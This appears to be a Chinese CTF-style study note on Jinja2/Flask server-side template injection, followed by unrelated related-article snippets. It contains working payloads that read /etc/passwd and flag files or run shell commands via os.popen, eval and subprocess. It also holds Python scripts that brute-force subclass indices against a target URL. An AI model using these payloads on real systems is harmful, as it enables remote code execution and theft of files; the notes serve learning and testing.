当前位置: 首页 > article >正文

SSTI漏洞学习笔记

一SSTI漏洞原理SSTIServer-Side Template Injection是一种服务器端模板注入漏洞发生在应用程序使用模板引擎渲染用户输入时未能正确过滤或转义用户提供的内容。服务端模板有很多网页是使用模板生成的html页面。所以就会存在SSTI漏洞的风险漏洞成因就是服务端接收了用户的恶意输入以后未经任何处理就将其作为 Web 应用模板内容的一部分模板引擎在进行目标编译渲染的过程中执行了用户插入的可以破坏模板的语句因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。简单来说ssti漏洞中网站的“模板引擎”把用户输入的内容错误地当成了可执行的代码而不是单纯的文字。例如学校发了一张奖状模板上面写着“{{姓名}}同学获得{{奖项}}”。正常情况下你填“张三”和“三好学生”打印出来就是“张三同学获得三好学生”。但如果有人故意在“奖项”那里填**“{{7*7}}”**结果打印出来变成“张三同学获得49”——这就说明模板把你的输入当成数学题算了而不是普通文字。也就是说如果网页不存在ssti漏洞你注入{{7*7}}是原路返回不会计算的。但是如果它执行了返回了49就说明漏洞可以被RCE攻击Ssti漏洞注入的基本流程有以下几点漏洞检测、引擎识别、信息收集、代码执行/文件操作下面是我从网上找到可以说是最全的渲染引擎以及他们的payload格式这个引擎图解释一下下图中的引擎是支持用服务端模板生成html网页的框架结构。常见有ssti漏洞的地方php: Twig Smarty Bladepython: Django flaskjava:freemarker二推理用的什么模板注入漏洞检测明确模板类型的意义在于它们的编写语言不同的模板就可以更精确的找到注入语句网络上这张图非常的常见啊这里解释一下首先输入${7*7}如果代码执行了也就是说它回显是49。那么就代表着绿色箭头下一步就可以输入a{*comment*}b执行出来是ab来判断如果代码没有执行也就是说回显还是${7*7}这样就代表着红色箭头。下一步就输入{{7*7}}去判断以此类推……Os:这里的${“z”.join(“ab”)}执行出来是azb意思就是把z插入在ab之间Not vulnerable表示这里没有模板注入漏洞另{{7*7}}在Twig中返回49在Jinja2中返回77777777三继承关系魔术方法回显含义Print(c.__class__)class’__main__.C’当前类CPrint(c.__class__.__base__)class’__main__.B’当前类C的父类BPrint(c.__class__.__base__.__base__)class’__main__.A’父类的父类Print(c.__class__.__base__.__base__.__base__)class ‘object’层层递进Print(c._class__.__mro__)class’__main__.C’class’__main__.B’class’__main__.A’class ’object’罗列所有父类关系C(0)—B(1)—A(2)—objectPrint(c.class__.__mro [1].__subclasses__())class’__main__.C’class’__main__.D’查看B下的所有子类Print(c.class__.__mro __.__subclasses__()[1])class’__main__.D’调用D类四魔术方法1__class____class__ 是一个内置属性用于返回对象所属的类。这个属性在每个对象中都存在可以用来获取对象的类信息2__bases____bases__ 是一个内置属性用于返回一个类所直接继承的类。它以元组的形式返回所有直接父类。3__base____base__ 是一个内置属性用于返回一个类所直接继承的类。与 __bases__ 不同__base__ 返回的是单个父类而不是元组。4__mro____mro__ 是一个内置属性用于返回解析方法调用的顺序。它是一个元组包含了类及其所有父类的顺序5__subclasses__()__subclasses__() 是一个内置方法用于获取类的所有子类。它返回一个包含所有子类的列表。6__init____init__ 是一个特殊方法用于初始化对象的属性。虽然它不是内置属性但在很多情况下它被用作跳板来调用 globals从而执行一些特殊操作。7__globals____globals__ 是一个内置属性用于获取函数所处空间下可使用的模块、方法以及所有变量。这里顺便解决一下当时见面考遗留下来的问题不知道调用指令的编号怎么办在我们调用指定路径下的子类后会出现一堆可调用指令真的是一堆我们上面也说过调用指令是要有编号的。这个时候我们就需要把全部子类复制到记事本里把“”全部替换成“/n”。之后就能得到一个全部换行的表格然后查找一下你想要的指令查看它在第几行由于从0开始所以要行数减一 行数减一就是它的序号我们这里就用{{‘’.__class__.__base__.__subclasses__()[117]}}发现我们成功调用这个时候就要用init来检查它是否重载{{‘’.__class__.__base__.__subclasses__()[117].__init__}}没有wrapper字眼说明重载成功{{‘’.__class__.__base__.__subclasses__()[117].__init__.__globals__}}前期工作到这一步就可以说是结束了剩下的步骤也不多了但是有些繁杂所以就另开一个板块去详细说明了。五SSTI常用模块注入1文件读取查找子类class’_frozen_importlib_extermal.FileLoader’FileLoader的利用{{“.__class__.__mro__[1].__subclasses__()[79][“get_data”](0,”/etc/passwd”)}}读取flag{{“.__class__.__mro__[1].__subclasses__()[79][“get_data”](0,”/flag”)}}这里有一个自动检索FileLoader的脚本import requests urlinput(请输入url链接) for i in range(500): data{name:{{().__class__.__base__.__shbclasses__()[str(i)]}}} #name是可变量根据源码中的post请求参数修改 try: responserequests.post(url,datadata) #print(response.text) if response.status_code200: iffrozen_importlib_externalin response.text: #引号下的编号就是需要的编号自行修改 print(i) except: pass2内建函数eval执行命令Payload:{{‘’.__class__.__bases__[0].__subclasses__()[65].__init__.__globals__[‘__builtins__’][‘eval’](‘__import__(“os”).popen(“cat/etc/passwd”).read()’)}}__builtins__直接访问python的所有“内置”标识符Eval()计算字符串表达式的值__import__加载os模块Popen()执行一个shell以运行命令来开启一个进程依然有查找脚本import requests urlinput(请输入url链接:) for i in range(500): data{name:{{().__class__.__base__.__shbclasses__()[str(i)].__init__.__globals__[__builtins__]}}} #name是可变量根据源码中的post请求参数修改 try: responserequests.post(url,datadata) #print(response.text) if response.status_code200: ifevalin response.text: #引号下的编号就是需要的编号自行修改 print(i) except: pass3os模块执行命令最常使用【1】在其他函数中直接调用os模块通过config调用os{{config.__class__.__init__.__globals__[‘os’].popen(‘whoami’).read()}}通过url_for,调用os{{url_for.__globals__.os.popen(‘whoami’).read()}}【2】在已经加载os的子类里调用os模块{{‘’.__class__.__bases__[0].__subclasses__()[199].__init__.__globals__[‘os’].popen(“ls -l/opt”).read()}}这个方法和上面用的很相近这里依然有查找os模板的脚本import requests urlinput(请输入url链接) for i in range(500): data{name:{{().__class__.__base__.__shbclasses__()[str(i)].__init__.__globals__}}} #name是可变量根据源码中的post请求参数修改 try: responserequests.post(url,datadata) #print(response.text) if response.status_code200: ifos.pyin response.text: #引号下的编号就是需要的编号自行修改 print(i) except: passpass4importlib类执行命令(了解)可以加载第三方库使用load_module加载osPayload{{[].__class__.__bases__.__subclasses__()[69][“load_module”](“os”)[“popen”](“whoami”).read()}}5linecache函数执行命令Linecache函数用于读取任意一个文件的任意一行而这个函数也引入了os模块所以我们了解可以利用这个函数就好Payload{{‘’.__class__.__bases__[0].__subclasses__()[199].__init__.__globals__[‘linecache’][‘os’].popen(“ls -l/opt”).read()}}{{‘’.__class__.__bases__[0].__subclasses__()[199].__init__.__globals__.linecache.os.popen(“ls -l/opt”).read()}}(6)subprocess.Popen类执行命令主要是这个函数可以替换os.system,os.popen等函数{{[].class__.__base__.__subclasses__()[200](‘ls/’,shellTrue,stdout-1).communicate()[0].strip()}}以上是ssti最基本的原理和payload。当然ssti也有自动解题工具就是下面的焚靖。网上一般会让你去下载sstimap但是个人感觉下来焚靖要更好用。关于工具就不细讲了这里放一个师傅的wpfenjing工具使用_焚靖-CSDN博客

相关文章:

SSTI漏洞学习笔记

一,SSTI漏洞原理 SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,发生在应用程序使用模板引擎渲染用户输入时未能正确过滤或转义用户提供的内容。 服务端模板:有很多网页是使用模板生成的html页面…...

【单片机】架构设计

以上只是理想架构,或者说和RT-Thread一样,实际做项目往这个上面靠即可。...

MATLAB/Simulink搭建全桥LLC仿真:从参数计算到波形调试的保姆级避坑指南

MATLAB/Simulink全桥LLC仿真实战:从理论参数到波形优化的工程化实现 电力电子工程师在设计全桥LLC谐振变换器时,仿真环节往往是理论走向实践的第一道门槛。许多初学者在Simulink中搭建模型时,明明按照教科书计算了Lr、Lm、Cr等参数&#xff0…...

CMMI认证避坑指南:中小企业如何用最低成本拿下3级认证(附实战案例)

CMMI认证避坑指南:中小企业如何用最低成本拿下3级认证(附实战案例) 对于许多中小企业来说,CMMI认证似乎是一个遥不可及的目标——高昂的咨询费用、复杂的文档要求、漫长的准备周期,每一项都让资源有限的团队望而却步。…...

使用Microsoft Agent Framework构建C# AI代理雍

简介 langchain中提供的chain链组件,能够帮助我门快速的实现各个组件的流水线式的调用,和模型的问答 Chain链的组成 根据查阅的资料,langchain的chain链结构如下: $$Input \rightarrow Prompt \rightarrow Model \rightarrow Outp…...

从81.7万细胞中解码“语法”:人类发育多组学图谱首次揭示调控序列的硬规则与软约束

论文信息标题:Multiomics and deep learning dissect regulatory syntax in human development期刊/会议:Nature发表时间:25 February 2026论文链接:https://doi.org/10.1038/s41586-026-10326-9从81.7万细胞中解码“语法”&#…...

告别零样本提示:为什么在复杂业务里,Text2SQL微调才是王道?以DB-GPT-Hub为例

为什么Text2SQL微调在复杂业务场景中不可替代?DB-GPT-Hub实战解析 当企业数据库遇到多表关联、嵌套查询和业务专属术语时,传统零样本提示方法的SQL生成准确率往往会断崖式下跌。去年某金融科技团队在迁移核心交易系统时发现,即使使用顶级大模…...

【LeetCode刷题日记】:从 LeetCode 经典题看哈希表的场景化应用---数组、HashSet、HashMap 选型与算法实战

🔥个人主页:北极的代码(欢迎来访) 🎬作者简介:java后端学习者 ❄️个人专栏:苍穹外卖日记,SSM框架深入,JavaWeb ✨命运的结局尽可永在,不屈的挑战却不可须臾或…...

2026最权威的十大AI辅助论文方案解析与推荐

Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 一篇篇DeepSeek系列论文,呈现出大型语言模型架构以及训练方法方面的系统性创新&a…...

2026最权威的六大AI科研工具实测分析

Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 于学术写作范畴之内,论文AI工具正一步一趋成为研究者的关键辅助方式,…...

第16讲:C语⾔内存函数

目录 memcpy使⽤memmove使⽤memset函数的使⽤memcmp函数的使⽤1.memcpy(1)功能: memcpy 是完成内存块拷⻉的,不关注内存中存放的数据是啥。函数 memcpy 从 source 的位置开始向后复制 num 个字节的数据到 destination 指向的内存位…...

技术选型评估框架需求技术与团队匹配

技术选型评估框架:需求、技术与团队的精准匹配 在快速迭代的软件开发领域,技术选型直接决定项目的成败。如何从众多技术方案中选出最适合团队与业务需求的工具?关键在于构建一个科学的技术选型评估框架,确保需求、技术与团队能力…...

让微信网页版重新可用:wechat-need-web浏览器插件完全攻略

让微信网页版重新可用:wechat-need-web浏览器插件完全攻略 【免费下载链接】wechat-need-web 让微信网页版可用 / Allow the use of WeChat via webpage access 项目地址: https://gitcode.com/gh_mirrors/we/wechat-need-web 还在为微信网页版无法登录而烦恼…...

GitHub中文化插件实战指南:开发版与稳定版选型深度解析

GitHub中文化插件实战指南:开发版与稳定版选型深度解析 【免费下载链接】github-chinese GitHub 汉化插件,GitHub 中文化界面。 (GitHub Translation To Chinese) 项目地址: https://gitcode.com/gh_mirrors/gi/github-chinese GitHub中文化插件是…...

M5Unit-8Encoder驱动库:工业级8路编码器I²C嵌入式实践

1. M5Unit-8Encoder 库深度解析:面向嵌入式工程师的工业级旋转编码器驱动实践指南1.1 项目定位与工程价值M5Unit-8Encoder 是专为 M5Stack 生态中 UNIT-8Encoder 模块设计的嵌入式驱动库,其核心价值在于将一款具备 8 路独立增量式编码器接口、支持高速计…...

周红伟:龙虾安装大全,这应该是最详细的 OpenClaw 安装手册了(附20+张图)

OpenClaw 是一个开源 AI 代理框架,由奥地利开发者 Peter Steinberger 创建,专注于构建自主 AI 代理,能够执行实际任务(如写代码、管理文件、浏览网页等),而非仅限于聊天。它从一个简单原型迅速演变为 GitHu…...

5步终极指南:用WaveTools彻底解锁《鸣潮》120帧流畅体验

5步终极指南:用WaveTools彻底解锁《鸣潮》120帧流畅体验 【免费下载链接】WaveTools 🧰鸣潮工具箱 项目地址: https://gitcode.com/gh_mirrors/wa/WaveTools 你是否曾在《鸣潮》的激烈战斗中感受过画面卡顿?明明拥有强大的硬件配置&am…...

办公Agent的CI/CD时刻到来了

关注腾讯云开发者,一手技术干货提前解锁👇还记得手动部署的古早编程时代吗?代码写完,打个 tar 包,开 FTP 传到服务器上,SSH 进去解压,改配置文件,重启服务,刷一下页面祈祷…...

LVM磁盘扩容实战:如何在已有逻辑卷上直接扩展存储空间

1. LVM磁盘扩容的核心场景与原理 想象一下你的手机存储空间快满了,但你又不想删除珍贵的照片和视频。这时候最直接的办法就是买一张更大容量的存储卡,把数据迁移过去。但在服务器环境中,这种"换卡"操作往往意味着停机、数据迁移等一…...

c语言的优点介绍

C语言是一门通用计算机编程语言,应用广泛。C语言的设计目标是提供一种能以简易的方式编译、处理低级存储器、产生少量的机器码以及不需要任何运行环境支持便能运行的编程语言。接下来,小编为您介绍了c语言的优点介绍,感谢您的阅读! 1、简洁紧…...

从Excel到HTML:RAG分块策略在结构化数据召回中的革新实践

1. 为什么Excel数据需要特殊的分块策略? 在企业级应用中,Excel表格是最常见的数据载体之一。财务报告、销售数据、库存清单等结构化信息通常都以.xlsx格式存储和流转。但当我们尝试将这些数据接入RAG(检索增强生成)系统时&#xf…...

2026年04月10日热门Model/github项目

总结 2026年4月10日 新上榜的 6个GitHub项目 和 5个HuggingFace模型,反映了当前AI领域的几个核心趋势: 关键趋势: AI编程工具链成熟化:从代码生成(Superpowers、Archon)到知识管理(Claudian&…...

一季度收官,AI在交通运输行业表现如何?

公路、铁路、航空、水运,共同构成了这个国家的交通网络。货物经由港口中转,旅客借助铁路和航空流动,城市依靠道路交通维持日常运转。这张网络每天承载着数以亿计的出行和运输需求,任何一个环节的效率与安全,都会影响整…...

YOLO-Master 与 YOLO 开始吭

AI Agent 时代的沙箱需求 从 Copilot 到 Agent:执行能力的质变 在生成式 AI 的早期阶段,应用主要以“Copilot”形式存在,AI 仅作为辅助生成建议。然而,随着 AutoGPT、BabyAGI 以及 OpenAI Code Interpreter(现为 Advan…...

从原理到实践:详解双目散斑结构光的生成与优化

1. 散斑结构光的基础原理 当你用手电筒照射粗糙墙面时,会看到无数闪烁的光点,这就是自然界中最常见的散斑现象。在三维视觉领域,我们通过精心设计的伪随机散斑图案(Pseudorandom Speckle Pattern),将这种物…...

大模型之Linux服务器部署大模型筛

一、各自优势和对比 这是检索出来的数据,据说是根据第三方评测与企业数据,三款产品在代码生成质量上各有侧重: 产品 语言优势 场景亮点 核心差异 百度 Comate C核心代码质量第一;Python首生成率达92.3% SQL生成准确率提升35%&…...

【Python】CairoSVG实战:从SVG到多格式转换的完整指南

1. 为什么选择CairoSVG进行SVG转换 如果你经常需要处理矢量图形,肯定遇到过这样的场景:设计部门给你发来SVG文件,但你的应用场景需要PNG格式;或者需要把SVG图标批量导出为PDF文档。这时候CairoSVG就是你的瑞士军刀。 我在实际项目…...

AI原生软件技术选型到底怎么选?:一张动态决策树图谱,覆盖LLM接入、向量基建、Agent编排与合规审计4大生死关

第一章:AI原生软件技术选型的底层逻辑与决策范式 2026奇点智能技术大会(https://ml-summit.org) AI原生软件并非传统应用叠加模型API的简单拼接,而是以模型为一等公民、数据流为骨架、推理生命周期为驱动内核的全新构造范式。其技术选型本质是权衡“表达…...

MinIO初始化报错`Invalid endPoint`全解析:从URL规范到调试技巧

1. 为什么你的MinIO客户端总是报Invalid endPoint错误? 最近在帮团队排查MinIO集成问题时,发现超过60%的初始化错误都源于endPoint配置不当。很多开发者习惯性复制浏览器地址栏的URL直接粘贴到代码里,结果运行时却收到冰冷的Invalid endPoint…...

MySQL锁机制:从全局锁到行级锁的深度解读挚

如果有多个供应商,你也可以使用 [[CC-Switch]] 来可视化管理这些API key,以及claude code 的skills。 # 多平台安装指令 curl -fsSL https://claude.ai/install.sh | bash ## Claude Code 配置 GLM Coding Plan curl -O "https://cdn.bigmodel.cn/i…...